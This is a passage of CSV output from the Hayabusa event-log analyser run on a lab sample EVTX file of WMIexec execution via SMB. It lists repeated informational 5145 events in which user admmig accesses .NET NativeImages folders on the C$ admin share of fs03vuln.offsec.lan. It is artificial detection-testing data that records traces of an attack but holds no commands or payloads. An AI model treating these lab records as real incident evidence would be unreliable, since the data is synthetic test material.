Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Activities : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Activities\16738205fa35676f5eda6d7d70169936 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddI3d71a354# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddI3d71a354#\0a1d9187e911a67185317ffa7ee40ef0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddIn : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddIn\14b968adbdb2082b1b938b20b5cb24b5 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp7dda8007# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp7dda8007#\10dd4c410de361a8ee03b5b7c662ccc9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404#\7845e0cf7da2edf653fbcc126cda2f48 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Compba577418# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Compba577418#\9db094774e9db914aedfcad797c955d7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#\c8152fae930d6b5e4dd5323561626549 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\c5bf2f5c3e13726b3984a900221e1778 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Core : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Core\c1194e56644c7688e7eb0f68a57dcc30 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data\8a7f63a63249ceccb5c51a9a372aaf64 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Entity : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Entity\9332198f4736c780facfd62fead6fa26 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Linq : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Linq\afe9ad217242ffe7adeeebf7417a0e56 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Services : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Services\ee663803638dd6a1e68078d00330c716 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.SqlXml : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.SqlXml\a686774445eff8eba0a781106f24b040 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data14bed3a9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data14bed3a9#\6255822d609f7753b8b77a030c397503 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data7706cdc8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data7706cdc8#\730ce0d11e99c329a9ab7bd75787f1bf : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data86569bbf# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data86569bbf#\3d5b722235db7e8a8c7d1344c7221c33 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data16016462# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data16016462#\003de8140f5201b90706bed8c0b34d9a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Datab086ae17# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Datab086ae17#\8b98eff35de01ce97f419f50f85f6123 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Deployment : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Deployment\53494598e1b6d05a1c7e3020cc4e9106 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Design : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Design\52a567b78cdfcd6f0926ba88bd575776 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Device : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Device\7270490235668fa0578aec716a28ce87 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire5d62f0a2# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire5d62f0a2#\54c0c8fb72275b54709f09380c489b31 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire573b08f5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire573b08f5#\8f83846bacd706e939a5ed0f8b5e3a25 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#\8f81b927dcc93ba9ce82d9b8a45d3ee6 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Draw0a54d252# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Draw0a54d252#\37cc106c66bc77ec23840bde30a2b4ad : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\ddb52221ad0200b7c2e0a308e47d5c7c : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic\93aa8a60d293a05752aca14646afe6d2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35#\65b4d38e24dfdd935b19ba1de243c244 : IP Address: 
